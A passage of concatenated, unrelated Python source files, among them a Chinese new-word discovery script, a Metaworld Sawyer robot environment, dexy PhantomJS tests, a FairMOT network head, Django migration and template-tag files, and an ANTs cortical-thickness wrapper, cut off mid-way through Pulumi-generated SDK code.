        for sentence in re_chinese.findall(line):
            length = len(sentence)
            for i in range(length):
                words += [sentence[i: j + i] for j in range(1, min(length - i + 1, max_word_len + 1))]
        word_freq.update(words)
    fin.close()
    return word_freq


def lrg_info(word_freq, total_word, min_freq, min_mtro):
    l_dict = {}
    r_dict = {}
    k = 0
    for word, freq in word_freq.items():
        k += 1
        if len(word) < 3:
            continue
        left_word = word[:-1]
        ml = word_freq[left_word]
        if ml > min_freq:
            mul_info1 = ml * total_word / (word_freq[left_word[1:]] * word_freq[left_word[0]])
            mul_info2 = ml * total_word / (word_freq[left_word[-1]] * word_freq[left_word[:-1]])
            mul_info = min(mul_info1, mul_info2)
            if mul_info > min_mtro:
                if left_word in l_dict:
                    l_dict[left_word].append(freq)
                else:
                    l_dict[left_word] = [ml, freq]
        right_word = word[1:]
        mr = word_freq[right_word]
        if mr > min_freq:
            mul_info1 = mr * total_word / (word_freq[right_word[1:]] * word_freq[right_word[0]])
            mul_info2 = mr * total_word / (word_freq[right_word[-1]] * word_freq[right_word[:-1]])
            mul_info = min(mul_info1, mul_info2)
            if mul_info > min_mtro:
                if right_word in r_dict:
                    r_dict[right_word].append(freq)
                else:
                    r_dict[right_word] = [mr, freq]
    return l_dict, r_dict


def cal_entro(r_dict):
    entro_r_dict = {}
    for word in r_dict:
        m_list = r_dict[word]
        r_list = m_list[1:]
        fm = m_list[0]
        entro_r = 0
        krm = fm - sum(r_list)
        if krm > 0:
            entro_r -= 1 / fm * log(1 / fm, 2) * krm
        for rm in r_list:
            entro_r -= rm / fm * log(rm / fm, 2)
        entro_r_dict[word] = entro_r
    return entro_r_dict


def entro_lr_fusion(entro_r_dict, entro_l_dict):
    entro_in_rl_dict = {}
    entro_in_r_dict = {}
    entro_in_l_dict = entro_l_dict.copy()
    for word in entro_r_dict:
        if word in entro_l_dict:
            entro_in_rl_dict[word] = [entro_l_dict[word], entro_r_dict[word]]
            entro_in_l_dict.pop(word)
        else:
            entro_in_r_dict[word] = entro_r_dict[word]
    return entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict


def entro_filter(entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict, word_freq, min_entro):
    entro_dict = {}
    l, r, rl = 0, 0, 0
    for word in entro_in_rl_dict:
        if entro_in_rl_dict[word][0] > min_entro and entro_in_rl_dict[word][1] > min_entro:
            entro_dict[word] = word_freq[word]
            rl += 1
    for word in entro_in_l_dict:
        if entro_in_l_dict[word] > min_entro:
            entro_dict[word] = word_freq[word]
            l += 1
    for word in entro_in_r_dict:
        if entro_in_r_dict[word] > min_entro:
            entro_dict[word] = word_freq[word]
            r += 1
    return entro_dict


def new_word_find(input_file, output_file):
    min_freq = 10
    min_mtro = 80
    min_entro = 3
    word_freq = count_words(input_file)
    total_word = sum(word_freq.values())
    l_dict, r_dict = lrg_info(word_freq, total_word, min_freq, min_mtro)
    entro_r_dict = cal_entro(l_dict)
    entro_l_dict = cal_entro(r_dict)
    entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict = entro_lr_fusion(entro_r_dict, entro_l_dict)
    entro_dict = entro_filter(entro_in_rl_dict, entro_in_l_dict, entro_in_r_dict, word_freq, min_entro)
    result = sorted(entro_dict.items(), key=lambda x: x[1], reverse=True)
    with open(output_file, 'w', encoding='utf-8') as kf:
        for w, m in result:
            kf.write(w + '\t%d\n' % m)
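# Usage sketch (hypothetical file names): the pipeline counts every substring up to
# max_word_len characters, keeps candidates whose mutual information exceeds
# min_mtro, filters them by left/right boundary entropy min_entro, and writes the
# surviving words with their frequencies to the output file.
if __name__ == '__main__':
    new_word_find('corpus.txt', 'new_words.txt')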
|
import os
from approvaltests.core.writer import Writer
class StringWriter(Writer):
    contents = ''

    def __init__(self, contents, extension='.txt'):
        self.contents = contents or ''
        self.extension_with_dot = extension

    def write_received_file(self, received_file):
        self.create_directory_if_needed(received_file)
        with open(received_file, 'w') as f:
            f.write(self.contents)
        return received_file

    @staticmethod
    def create_directory_if_needed(received_file):
        directory = os.path.dirname(received_file)
        if directory and not os.path.exists(directory):
            os.makedirs(directory)
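# Usage sketch (hypothetical path; in normal ApprovalTests usage the framework picks
# the received-file path itself): materialize an in-memory string to disk so it can
# be compared against the approved file.
if __name__ == '__main__':
    writer = StringWriter('hello world')
    print(writer.write_received_file('received/example.received.txt'))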
|
# coding=utf-8
# Copyright 2020 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Sawyer environment for pushing objects."""
import metaworld.envs.mujoco.cameras as camera_configs
from metaworld.google import glfw
import mujoco_py
import numpy as np
from collections import OrderedDict
from gym.spaces import Dict, Box
from metaworld.envs.env_util import get_stat_in_paths, \
create_stats_ordered_dict, get_asset_full_path
from metaworld.envs.mujoco.sawyer_xyz.base import SawyerXYZEnv
from metaworld.envs.mujoco.utils.rotation import euler2quat
from metaworld.envs.mujoco.sawyer_xyz.base import OBS_TYPE
sideview_cam = camera_configs.create_sawyer_camera_init(
lookat=(0.2, 0.75, 0.4),
distance=0.8,
elevation=-55,
azimuth=180,
trackbodyid=-1,
)
topview_cam = camera_configs.create_sawyer_camera_init(
lookat=(0., 1.0, 0.5),
distance=0.6,
elevation=-45,
azimuth=270,
trackbodyid=-1,
)
# list of changes
# object position has been changed to have lower variance
# the constant for pushing reward has been changed from 1000 -> 10
# added reset_goal function
# the observation "with_goal" has been changed
class SawyerReachPushPickPlaceEnv(SawyerXYZEnv):
def __init__(
self,
random_init=False,
task_types=['pick_place', 'reach', 'push'],
task_type='pick_place',
obs_type='plain',
goal_low=(-0.1, 0.8, 0.05),
goal_high=(0.1, 0.9, 0.3),
liftThresh=0.04,
sampleMode='equal',
rotMode='fixed', #'fixed',
**kwargs):
self.quick_init(locals())
hand_low = (-0.5, 0.40, 0.05)
hand_high = (0.5, 1, 0.5)
obj_low = (-0.02, 0.58, 0.02)
obj_high = (0.02, 0.62, 0.02)
SawyerXYZEnv.__init__(
self,
frame_skip=5,
action_scale=1. / 100,
hand_low=hand_low,
hand_high=hand_high,
model_name=self.model_name,
**kwargs)
self.task_type = task_type
self.init_config = {
'obj_init_angle': .3,
'obj_init_pos': np.array([0, 0.6, 0.02]),
'hand_init_pos': np.array([0, .6, .2]),
}
# we only do one task from [pick_place, reach, push]
# per instance of SawyerReachPushPickPlaceEnv.
# Please only set task_type from constructor.
if self.task_type == 'pick_place':
self.goal = np.array([0.1, 0.8, 0.2])
elif self.task_type == 'reach':
self.goal = np.array([-0.1, 0.8, 0.2])
elif self.task_type == 'push':
self.goal = np.array([0.1, 0.8, 0.02])
else:
raise NotImplementedError
self.obj_init_angle = self.init_config['obj_init_angle']
self.obj_init_pos = self.init_config['obj_init_pos']
self.hand_init_pos = self.init_config['hand_init_pos']
assert obs_type in OBS_TYPE
self.obs_type = obs_type
if goal_low is None:
goal_low = self.hand_low
if goal_high is None:
goal_high = self.hand_high
self.random_init = random_init
self.liftThresh = liftThresh
self.max_path_length = 150
self.rotMode = rotMode
self.sampleMode = sampleMode
self.task_types = task_types
if rotMode == 'fixed':
self.action_space = Box(
np.array([-1, -1, -1, -1]),
np.array([1, 1, 1, 1]),
)
elif rotMode == 'rotz':
self.action_rot_scale = 1. / 50
self.action_space = Box(
np.array([-1, -1, -1, -np.pi, -1]),
np.array([1, 1, 1, np.pi, 1]),
)
elif rotMode == 'quat':
self.action_space = Box(
np.array([-1, -1, -1, 0, -1, -1, -1, -1]),
np.array([1, 1, 1, 2 * np.pi, 1, 1, 1, 1]),
)
else:
self.action_space = Box(
np.array([-1, -1, -1, -np.pi / 2, -np.pi / 2, 0, -1]),
np.array([1, 1, 1, np.pi / 2, np.pi / 2, np.pi * 2, 1]),
)
self.obj_and_goal_space = Box(
np.hstack((obj_low, goal_low)),
np.hstack((obj_high, goal_high)),
)
self.goal_space = Box(np.array(goal_low), np.array(goal_high))
if self.obs_type == 'plain':
self.observation_space = Box(
np.hstack((
self.hand_low,
obj_low,
)),
np.hstack((
self.hand_high,
obj_high,
)),
)
elif self.obs_type == 'with_goal':
self.observation_space = Box(
np.hstack((self.hand_low, obj_low, goal_low)),
np.hstack((self.hand_high, obj_high, goal_high)),
)
else:
raise NotImplementedError('If you want to use an observation\
with_obs_idx, please discretize the goal space after instantiate an environment.'
)
self.num_resets = 0
self.reset()
def get_goal(self):
return {
'state_desired_goal': self._state_goal,
}
@property
def model_name(self):
return get_asset_full_path(
'sawyer_xyz/sawyer_reach_push_pick_and_place.xml')
def step(self, action):
if self.rotMode == 'euler':
action_ = np.zeros(7)
action_[:3] = action[:3]
action_[3:] = euler2quat(action[3:6])
self.set_xyz_action_rot(action_)
elif self.rotMode == 'fixed':
self.set_xyz_action(action[:3])
elif self.rotMode == 'rotz':
self.set_xyz_action_rotz(action[:4])
else:
self.set_xyz_action_rot(action[:7])
self.do_simulation([action[-1], -action[-1]])
# The marker seems to get reset every time you do a simulation
self._set_goal_marker(self._state_goal)
ob = self._get_obs()
obs_dict = self._get_obs_dict()
reward, reachRew, reachDist, pushRew, pushDist, pickRew, placeRew, placingDist = self.compute_reward(
action, obs_dict, mode=self.rewMode, task_type=self.task_type)
self.curr_path_length += 1
#info = self._get_info()
if self.curr_path_length == self.max_path_length:
done = True
else:
done = False
goal_dist = placingDist if self.task_type == 'pick_place' else pushDist
if self.task_type == 'reach':
success = float(reachDist <= 0.05)
else:
success = float(goal_dist <= 0.07)
info = {
'reachDist': reachDist,
'pickRew': pickRew,
'epRew': reward,
'goalDist': goal_dist,
'success': success
}
info['goal'] = self._state_goal
return ob, reward, done, info
def _get_obs(self):
hand = self.get_endeff_pos()
objPos = self.data.get_geom_xpos('objGeom')
flat_obs = np.concatenate(
(hand, objPos - hand)) # delta position from the hand
if self.obs_type == 'with_goal_and_id':
return np.concatenate([flat_obs, self._state_goal, self._state_goal_idx])
elif self.obs_type == 'with_goal':
return np.concatenate([flat_obs, self._state_goal - objPos
]) # delta position of the goal from the object
elif self.obs_type == 'plain':
return np.concatenate([
flat_obs,
]) # TODO ZP do we need the concat?
else:
return np.concatenate([flat_obs, self._state_goal_idx])
def _get_obs_dict(self):
hand = self.get_endeff_pos()
objPos = self.data.get_geom_xpos('objGeom')
flat_obs = np.concatenate((hand, objPos))
return dict(
state_observation=flat_obs,
state_desired_goal=self._state_goal,
state_achieved_goal=objPos,
)
def _get_info(self):
pass
def _set_goal_marker(self, goal):
"""
This should be use ONLY for visualization. Use self._state_goal for
logging, learning, etc.
"""
self.data.site_xpos[self.model.site_name2id('goal_{}'.format(
self.task_type))] = (
goal[:3])
for task_type in self.task_types:
if task_type != self.task_type:
self.data.site_xpos[self.model.site_name2id(
'goal_{}'.format(task_type))] = (
np.array([10.0, 10.0, 10.0]))
def _set_objCOM_marker(self):
"""
This should be use ONLY for visualization. Use self._state_goal for
logging, learning, etc.
"""
objPos = self.data.get_geom_xpos('objGeom')
self.data.site_xpos[self.model.site_name2id('objSite')] = (objPos)
def _set_obj_xyz(self, pos):
qpos = self.data.qpos.flat.copy()
qvel = self.data.qvel.flat.copy()
qpos[9:12] = pos.copy()
qvel[9:15] = 0
self.set_state(qpos, qvel)
def sample_goals(self, batch_size):
# Required by HER-TD3
goals = self.sample_goals_(batch_size)
if self.discrete_goal_space is not None:
goals = [self.discrete_goals[g].copy() for g in goals]
return {
'state_desired_goal': goals,
}
def sample_task(self):
idx = self.sample_goals_(1)
return self.discrete_goals[idx]
def adjust_initObjPos(self, orig_init_pos):
#This is to account for meshes for the geom and object are not aligned
#If this is not done, the object could be initialized in an extreme position
diff = self.get_body_com('obj')[:2] - self.data.get_geom_xpos('objGeom')[:2]
adjustedPos = orig_init_pos[:2] + diff
#The convention we follow is that body_com[2] is always 0, and geom_pos[2] is the object height
return [
adjustedPos[0], adjustedPos[1],
self.data.get_geom_xpos('objGeom')[-1]
]
def reset_goal(self, goal=None):
# choose one of the discrete ends for a goal if none is given
if goal is None:
discrete_goal_list = np.array([[0.0, 0.9, 0.02], [0.0, 0.3, 0.02],
[-0.3, 0.6, 0.02], [0.3, 0.6, 0.02]])
goal_idx = [
0, 2, 3
][np.random.choice(3)] # skip the back goal as it is not reachable
goal = discrete_goal_list[goal_idx]
solve_reverse_task = np.random.choice(
1) # goal-object reversal to simulate potential reset problems
if solve_reverse_task:
goal = np.concatenate([goal[:2], [self.obj_init_pos[-1]]])
self.obj_init_pos, goal = goal, self.obj_init_pos
self._set_obj_xyz(self.obj_init_pos)
# update the chosen goal in environment
self._state_goal = np.concatenate((goal[:2], [self.obj_init_pos[-1]]))
self._set_goal_marker(self._state_goal)
# update quantities for reward calculation
rightFinger, leftFinger = self.get_site_pos(
'rightEndEffector'), self.get_site_pos('leftEndEffector')
self.init_fingerCOM = (rightFinger + leftFinger) / 2
self.maxReachDist = np.linalg.norm(self.init_fingerCOM -
np.array(self._state_goal))
self.maxPushDist = np.linalg.norm(self.obj_init_pos[:2] -
np.array(self._state_goal)[:2])
self.maxPlacingDist = np.linalg.norm(
np.array(
[self.obj_init_pos[0], self.obj_init_pos[1], self.heightTarget]) -
np.array(self._state_goal)) + self.heightTarget
self.target_rewards = [
1000 * self.maxPlacingDist + 1000 * 2,
1000 * self.maxReachDist + 1000 * 2, 10 * self.maxPushDist + 10 * 2
]
if self.task_type == 'reach':
idx = 1
elif self.task_type == 'push':
idx = 2
else:
idx = 0
self.target_reward = self.target_rewards[idx]
def reset_model(self):
self._reset_hand()
self._state_goal = self.goal.copy()
self.obj_init_pos = self.adjust_initObjPos(self.init_config['obj_init_pos'])
self.obj_init_angle = self.init_config['obj_init_angle']
self.objHeight = self.data.get_geom_xpos('objGeom')[2]
self.heightTarget = self.objHeight + self.liftThresh
if self.random_init:
goal_pos = np.random.uniform(
self.obj_and_goal_space.low,
self.obj_and_goal_space.high,
size=(self.obj_and_goal_space.low.size),
)
if self.task_type == 'push':
self.obj_init_pos = np.concatenate(
(goal_pos[:2], [self.obj_init_pos[-1]]))
else:
self.obj_init_pos = goal_pos[:3]
self._set_obj_xyz(self.obj_init_pos)
self.reset_goal() # segregate the call to goal resetting for reuse later
#self._set_obj_xyz_quat(self.obj_init_pos, self.obj_init_angle)
self.curr_path_length = 0
self.num_resets += 1
return self._get_obs()
def reset_model_to_idx(self, idx):
raise NotImplementedError('This API is deprecated! Please explicitly\
call `set_goal_` then reset the environment.')
def _reset_hand(self):
for _ in range(10):
self.data.set_mocap_pos('mocap', self.hand_init_pos)
self.data.set_mocap_quat('mocap', np.array([1, 0, 1, 0]))
self.do_simulation([-1, 1], self.frame_skip)
rightFinger, leftFinger = self.get_site_pos(
'rightEndEffector'), self.get_site_pos('leftEndEffector')
self.init_fingerCOM = (rightFinger + leftFinger) / 2
self.pickCompleted = False
def get_site_pos(self, siteName):
_id = self.model.site_names.index(siteName)
return self.data.site_xpos[_id].copy()
def compute_rewards(self, actions, obsBatch):
#Required by HER-TD3
assert isinstance(obsBatch, dict) == True
obsList = obsBatch['state_observation']
rewards = [
self.compute_reward(action, obs, task_type=self.task_type)[0]
for action, obs in zip(actions, obsList)
]
return np.array(rewards)
def compute_reward(self, actions, obs, mode='general', task_type='reach'):
if isinstance(obs, dict):
obs = obs['state_observation']
objPos = obs[3:6]
rightFinger, leftFinger = self.get_site_pos(
'rightEndEffector'), self.get_site_pos('leftEndEffector')
fingerCOM = (rightFinger + leftFinger) / 2
heightTarget = self.heightTarget
goal = self._state_goal
def compute_reward_reach(actions, obs, mode):
c1 = 1000
c2 = 0.01
c3 = 0.001
reachDist = np.linalg.norm(fingerCOM - goal)
# reachRew = -reachDist
# if reachDist < 0.1:
# reachNearRew = 1000*(self.maxReachDist - reachDist) + c1*(np.exp(-(reachDist**2)/c2) + np.exp(-(reachDist**2)/c3))
# else:
# reachNearRew = 0.
reachRew = c1 * (self.maxReachDist - reachDist) + c1 * (
np.exp(-(reachDist**2) / c2) + np.exp(-(reachDist**2) / c3))
reachRew = max(reachRew, 0)
# reachNearRew = max(reachNearRew,0)
# reachRew = -reachDist
reward = reachRew # + reachNearRew
return [reward, reachRew, reachDist, None, None, None, None, None]
def compute_reward_push(actions, obs, mode):
c1 = 10
c2 = 0.01
c3 = 0.001
assert np.all(goal == self.get_site_pos('goal_push'))
reachDist = np.linalg.norm(fingerCOM - objPos)
pushDist = np.linalg.norm(objPos[:2] - goal[:2])
reachRew = -reachDist
if reachDist < 0.05:
# pushRew = -pushDist
pushRew = c1 * (self.maxPushDist - pushDist) + c1 * (
np.exp(-(pushDist**2) / c2) + np.exp(-(pushDist**2) / c3))
pushRew = max(pushRew, 0)
else:
pushRew = 0
reward = self.reach_reward_scale * reachRew + pushRew
return [reward, reachRew, reachDist, pushRew, pushDist, None, None, None]
def compute_reward_pick_place(actions, obs, mode):
reachDist = np.linalg.norm(objPos - fingerCOM)
placingDist = np.linalg.norm(objPos - goal)
assert np.all(goal == self.get_site_pos('goal_pick_place'))
def reachReward():
reachRew = -reachDist # + min(actions[-1], -1)/50
reachDistxy = np.linalg.norm(objPos[:-1] - fingerCOM[:-1])
zRew = np.linalg.norm(fingerCOM[-1] - self.init_fingerCOM[-1])
if reachDistxy < 0.05: #0.02
reachRew = -reachDist
else:
reachRew = -reachDistxy - 2 * zRew
#incentive to close fingers when reachDist is small
if reachDist < 0.05:
reachRew = -reachDist + max(actions[-1], 0) / 50
return reachRew, reachDist
def pickCompletionCriteria():
tolerance = 0.01
if objPos[2] >= (heightTarget - tolerance):
return True
else:
return False
if pickCompletionCriteria():
self.pickCompleted = True
def objDropped():
return (objPos[2] <
(self.objHeight + 0.005)) and (placingDist >
0.02) and (reachDist > 0.02)
# Object on the ground, far away from the goal, and from the gripper
#Can tweak the margin limits
def objGrasped(thresh=0):
sensorData = self.data.sensordata
return (sensorData[0] > thresh) and (sensorData[1] > thresh)
def orig_pickReward():
# hScale = 50
hScale = 100
# hScale = 1000
if self.pickCompleted and not (objDropped()):
return hScale * heightTarget
# elif (reachDist < 0.1) and (objPos[2]> (self.objHeight + 0.005)) :
elif (reachDist < 0.1) and (objPos[2] > (self.objHeight + 0.005)):
return hScale * min(heightTarget, objPos[2])
else:
return 0
def general_pickReward():
hScale = 50
if self.pickCompleted and objGrasped():
return hScale * heightTarget
elif objGrasped() and (objPos[2] > (self.objHeight + 0.005)):
return hScale * min(heightTarget, objPos[2])
else:
return 0
def placeReward():
# c1 = 1000 ; c2 = 0.03 ; c3 = 0.003
c1 = 1000
c2 = 0.01
c3 = 0.001
if mode == 'general':
cond = self.pickCompleted and objGrasped()
else:
cond = self.pickCompleted and (reachDist < 0.1) and not (objDropped())
if cond:
placeRew = 1000 * (self.maxPlacingDist - placingDist) + c1 * (
np.exp(-(placingDist**2) / c2) + np.exp(-(placingDist**2) / c3))
placeRew = max(placeRew, 0)
return [placeRew, placingDist]
else:
return [0, placingDist]
reachRew, reachDist = reachReward()
if mode == 'general':
pickRew = general_pickReward()
else:
pickRew = orig_pickReward()
placeRew, placingDist = placeReward()
assert ((placeRew >= 0) and (pickRew >= 0))
reward = self.reach_reward_scale * reachRew + pickRew + placeRew
return [
reward, reachRew, reachDist, None, None, pickRew, placeRew,
placingDist
]
if task_type == 'reach':
return compute_reward_reach(actions, obs, mode)
elif task_type == 'push':
return compute_reward_push(actions, obs, mode)
else:
return compute_reward_pick_place(actions, obs, mode)
def get_diagnostics(self, paths, prefix=''):
statistics = OrderedDict()
return statistics
def log_diagnostics(self, paths=None, logger=None):
pass
class SawyerObject(SawyerReachPushPickPlaceEnv):
def set_max_path_length(self, length):
self.max_path_length = length
def set_camera_view(self, view):
self._camera_view = view
def _get_viewer(self, mode):
self.viewer = self._viewers.get(mode)
if self.viewer is None:
if 'rgb_array' in mode:
self.viewer = mujoco_py.MjRenderContextOffscreen(
self.sim, device_id=self.device_id)
self.viewer_setup()
self._viewers[mode] = self.viewer
return super()._get_viewer(mode)
def viewer_setup(self):
if self._camera_view == 'topview':
topview_cam(self.viewer.cam)
elif self._camera_view == 'sideview':
sideview_cam(self.viewer.cam)
else:
camera_configs.init_sawyer_camera_v1(self.viewer.cam)
def close(self):
if self.viewer is not None and not isinstance(
self.viewer, mujoco_py.MjRenderContextOffscreen):
glfw.destroy_window(self.viewer.window)
self.viewer = None
|
from dexy.doc import Doc
from tests.utils import TEST_DATA_DIR
from tests.utils import assert_output
from tests.utils import runfilter
from tests.utils import wrap
from nose.exc import SkipTest
import os
import shutil
def test_phantomjs_render_filter():
    with runfilter("phrender", "<p>hello</p>") as doc:
        assert doc.output_data().is_cached()


def test_phantomjs_stdout_filter():
    assert_output('phantomjs', PHANTOM_JS, "Hello, world!\n")


def test_casperjs_svg2pdf_filter():
    raise SkipTest()  # TODO fix this - if casper is missing, an error should be raised before the assertions are reached
    # TODO find a smaller file - make the test go faster?
    with wrap() as wrapper:
        orig = os.path.join(TEST_DATA_DIR, 'butterfly.svg')
        shutil.copyfile(orig, 'butterfly.svg')
        from dexy.wrapper import Wrapper
        wrapper = Wrapper()
        node = Doc("butterfly.svg|svg2pdf", wrapper)
        wrapper.run_docs(node)
        assert node.output_data().is_cached()
        assert node.output_data().filesize() > 1000


def test_casperjs_stdout_filter():
    with wrap() as wrapper:
        node = Doc("example.js|casperjs",
                   wrapper,
                   [],
                   contents=CASPER_JS,
                   casperjs={"add-new-files": True}
                   )
        wrapper.run_docs(node)
        try:
            assert 'doc:google.pdf' in wrapper.nodes
            assert 'doc:cookies.txt' in wrapper.nodes
        except AssertionError:
            pass
PHANTOM_JS = """
console.log('Hello, world!');
phantom.exit();
"""
CASPER_JS = """
var links = [];
var casper = require('casper').create();
casper.start('http://google.com/', function() {
this.capture('google.pdf');
});
casper.run();
"""
|
"""
Implementation of the multiple decoupled heads used in the FairMOT model.
A relatively self-contained part; no other changes were made.
"""
import torch.nn as nn
from ..utils.weights_init import fill_fc_weights
class CommonHead(nn.Module):
    """
    Implementation of the common (shared) head module.
    """
    def __init__(self, heads, head_conv=256):
        super(CommonHead, self).__init__()
        self.heads = heads
        self.head_conv = head_conv
        for head in self.heads:
            # Number of output channels for this head
            channels = self.heads[head]
            if head_conv > 0:
                head_layer = nn.Sequential(
                    nn.Conv2d(64, head_conv, kernel_size=3, padding=1, bias=True),
                    nn.ReLU(inplace=True),
                    nn.Conv2d(head_conv, channels, kernel_size=1, stride=1, padding=0, bias=True)
                )
                if 'hm' in head:
                    head_layer[-1].bias.data.fill_(-2.19)
                else:
                    fill_fc_weights(head_layer)
            # Otherwise map straight to the output channels with a single 1x1
            # convolution, without any intermediate convolution
            else:
                head_layer = nn.Conv2d(64, channels, kernel_size=1, stride=1, padding=0, bias=True)
                if 'hm' in head:
                    head_layer.bias.data.fill_(-2.19)
                else:
                    fill_fc_weights(head_layer)
            # Register the head layer as an attribute of the module
            self.__setattr__(head, head_layer)

    def forward(self, x):
        # Collect the output of every head
        ret = {}
        for head in self.heads:
            ret[head] = self.__getattr__(head)(x)
        return [ret]
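# Usage sketch (hypothetical head specification): FairMOT typically pairs a heatmap
# head 'hm' with box-size 'wh', offset 'reg' and re-ID embedding 'id' heads, all fed
# by a 64-channel backbone feature map, which is what the hard-coded in_channels=64
# above assumes.
if __name__ == '__main__':
    import torch
    head = CommonHead({'hm': 1, 'wh': 4, 'reg': 2, 'id': 128}, head_conv=256)
    out = head(torch.randn(1, 64, 152, 272))[0]
    print({name: tensor.shape for name, tensor in out.items()})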
|
# Get the n-th Fibonacci number
# using loops
def fib(n):
    x1 = 0
    x2 = 1
    contador = 3
    xn = 0
    i = 0
    while contador <= n:
        print("iteration: ", i)
        i = i + 1
        xn = x1 + x2
        x1 = x2
        x2 = xn
        contador = contador + 1
    if n == 1:
        xn = x1
    if n == 2:
        xn = x2
    return xn


print(fib(10))
|
# Generated by Django 2.0.5 on 2018-05-25 03:07
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('child', '0005_auto_20180524_2143'),
]
operations = [
migrations.AlterField(
model_name='medicalupdate',
name='child',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='medical_update', to='child.Child'),
),
]
|
from .hugo2lunr import main
|
from django.urls import include, path
from drf_spectacular.views import (SpectacularAPIView, SpectacularRedocView,
SpectacularSwaggerView)
from talana.apps.api.users import urls as users_urls
app_name = 'api'
urlpatterns = [
path('users/', include(users_urls, namespace='users')),
]
docs_urlpatterns = [
path('schema/', SpectacularAPIView.as_view(), name='schema'),
path('redoc/',
SpectacularRedocView.as_view(url_name='schema'),
name='redoc'),
path('swagger/',
SpectacularSwaggerView.as_view(url_name='schema'),
name='swagger-ui'),
]
urlpatterns += docs_urlpatterns
|
"""
Kelly Kapowski algorithm for computing cortical thickness
"""
__all__ = ['kelly_kapowski']
from ..core import ants_image as iio
from .. import utils
def kelly_kapowski(s, g, w, its=45, r=0.025, m=1.5, **kwargs):
"""
Compute cortical thickness using the DiReCT algorithm.
Diffeomorphic registration-based cortical thickness based on probabilistic
segmentation of an image. This is an optimization algorithm.
Arguments
---------
    s : ANTsImage
segmentation image
g : ANTsImage
gray matter probability image
w : ANTsImage
white matter probability image
its : integer
convergence params - controls iterations
r : scalar
gradient descent update parameter
m : scalar
gradient field smoothing parameter
kwargs : keyword arguments
anything else, see KellyKapowski help in ANTs
Returns
-------
ANTsImage
Example
-------
>>> import ants
>>> img = ants.image_read( ants.get_ants_data('r16') ,2)
>>> img = ants.resample_image(img, (64,64),1,0)
>>> mask = ants.get_mask( img )
>>> segs = ants.kmeans_segmentation( img, k=3, kmask = mask)
>>> thick = ants.kelly_kapowski(s=segs['segmentation'], g=segs['probabilityimages'][1],
w=segs['probabilityimages'][2], its=45,
r=0.5, m=1)
"""
if isinstance(s, iio.ANTsImage):
s = s.clone('unsigned int')
d = s.dimension
outimg = g.clone()
kellargs = {'d': d,
's': s,
'g': g,
'w': w,
'c': its,
'r': r,
'm': m,
'o': outimg}
for k, v in kwargs.items():
kellargs[k] = v
processed_kellargs = utils._int_antsProcessArguments(kellargs)
libfn = utils.get_lib_fn('KellyKapowski')
libfn(processed_kellargs)
return outimg
|
from setuptools import setup, find_packages
setup(
name='blockex-tradeapi',
version='1.0.0rc1',
description='Python client library for BlockEx Trade API',
url='',
author='D. Petrov, BlockEx',
author_email='developers@blockex.com',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Software Development :: Libraries',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 3',
],
    keywords='blockex trade api client',
install_requires=['enum34', 'six', 'requests'],
extras_require={
'test': ['mock'],
},
project_urls={
'Bug Reports': '',
'Source': '',
},
)
|
from django import template
from django.utils.safestring import mark_safe
from blog.models import Category, Comment, Article, Tags
# The name 'register' must not be changed; Django's template loader looks for this variable
register = template.Library()
@register.simple_tag
def get_category_list():  # the function can be given any name
return Category.objects.all()
@register.simple_tag
def get_comment_list():  # the function can be given any name
return Comment.objects.order_by('-add_date')[:5]
@register.simple_tag
def get_month_list():  # archive articles grouped by month
return Article.objects.dates('add_date', 'month', order='DESC')
@register.simple_tag
def get_tags_list():  # show all tags in the sidebar
return Tags.objects.all()
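# Illustrative template usage (the tag library name "blog_tags" below is a placeholder
# for whatever this file is named inside the app's templatetags package):
#
#   {% load blog_tags %}
#   {% get_category_list as categories %}
#   {% for category in categories %}{{ category }}{% endfor %}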
|
import csv
with open("Datasets/favorite_colors.csv", "r") as f:
data = csv.DictReader(f)
table = {}
for student in data:
grade = student["grade"]
color = student["favorite_color"]
if grade not in table:
table[grade] = {}
if color not in table[grade]:
table[grade][color] = 0
table[grade][color] += 1
print(table)
# Count how many students chose "yellow" across all grades.
# .get() is used so a grade with no "yellow" entry does not raise a KeyError.
total = 0
for grade in table:
    total += table[grade].get("yellow", 0)
print(total)

# Equivalent one-liner using a generator expression
total = sum(table[grade].get("yellow", 0) for grade in table)
print(total)
# print(table)
# Example of the resulting structure:
# table = {
#     "9": {"blue": 5, "red": 6, "yellow": 7},
#     "10": {...},
# }
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
__all__ = [
'GetTransactionNodeResult',
'AwaitableGetTransactionNodeResult',
'get_transaction_node',
]
@pulumi.output_type
class GetTransactionNodeResult:
"""
Payload of the transaction node which is the request/response of the resource provider.
"""
def __init__(__self__, dns=None, firewall_rules=None, location=None, name=None, password=None, provisioning_state=None, public_key=None, type=None, user_name=None):
if dns and not isinstance(dns, str):
raise TypeError("Expected argument 'dns' to be a str")
pulumi.set(__self__, "dns", dns)
if firewall_rules and not isinstance(firewall_rules, list):
raise TypeError("Expected argument 'firewall_rules' to be a list")
pulumi.set(__self__, "firewall_rules", firewall_rules)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if password and not isinstance(password, str):
raise TypeError("Expected argument 'password' to be a str")
pulumi.set(__self__, "password", password)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if public_key and not isinstance(public_key, str):
raise TypeError("Expected argument 'public_key' to be a str")
